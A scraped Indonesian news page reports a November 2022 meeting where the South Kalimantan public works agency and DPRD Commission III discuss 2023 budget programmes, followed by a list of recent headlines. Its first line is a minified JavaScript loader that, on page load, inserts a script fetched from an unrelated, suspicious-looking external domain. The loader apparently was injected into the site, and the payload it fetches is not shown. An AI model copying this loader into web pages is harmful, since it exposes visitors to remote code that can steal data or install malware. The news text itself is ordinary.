(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PUPR PROV KALSEL

Dinas PUPR Ikuti Rapat Kerja Bersama Komisi III DPRD Kalsel


KANALKALIMANTAN.COM, BANJARMASIN – Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel menjadi satu dari sejumlah satuan organisasi perangkat daerah (SOPD) Pemprov Kalsel yang mengikuti rapat kerja bersama Komisi III DPRD Kalsel.

Selain Dinas PUPR Kalsel, rapat kerja yang digelar Selasa (22/11/2022) itu juga dihadiri jajaranDishub, Disperkim, serta Dinas ESDM Provinsi Kalsel.

Kegiatan digelar di Ruang Rapat Komisi III dan dihadiri Wakil Ketua DPRD Kalsel, M. Syaripuddin itu dilaksanakan dalam rangka pembahasan program kerja mitra kerja Komisi III tahun anggaran 2023.

Rapat dihadiri oleh Kepala Dinas PUPR Kalsel Ir Ahmad Solhan ST, MT, Sekretaris Andri Fadli SE MM, dan sejumlah kabid dan kasi pada Dinas PUPR Provinsi Kalsel.

 

 

Baca juga: Aksi Nekat Emak-emak Curi Mesin BPK di Banjarmasin, Dalih Bayar Arisan dan Baju

Ketua Komisi III, H Hasanuddin Murad SH, mengatakan dengan disahkannya Raperda APBD dan adanya penambahan anggaran, maka program kerja harus dibahas dengan matang sebelum difinalisasikan dalam rapat Banggar yang akan diadakan pada Selasa (22/11/2022) malam.

Karena finalisasi itu, lanjut Hasanuddin, maka pihaknya memantapkan lagi dengan semua mitra kerja yang kebetulan juga mendapa tambahan anggaran.

Sementara, Kepala Dinas PUPR Provinsi Kalsel, Ir Ahmad Solhan ST MT saat diminta tanggapannya mengenai kegiatan itu menyatakan, kegiatan tersebut meruoakan kegiatan rutin yang dilakukan.

“Ini untuk mengharmoniskan program-program yang kami susun. Antara kami, Dinas PUPR dengan Komisi III DPRD Kalsel,” jelas Solhan, Rabu (23/11/2022).

Baca juga: Bayi yang Dibuang di Palam Dititip ke Panti Sosial Anak, Adopsi Tunggu Proses Pencarian Orangtua

Lebih jauh dia mengatakan, kegiatan seperti itu juga bertujuan meminta masukan apa saja dari DPRD dan menjadi bahan evaluasi bagi Dinas PUPR Provinsi Kalsel. (kanalkalimantan.com/rls)

Reporter: rls
Editor: Dhani


Risa

Recent Posts

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

24 menit ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

1 jam ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

14 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

15 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

15 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

16 jam ago

This website uses cookies.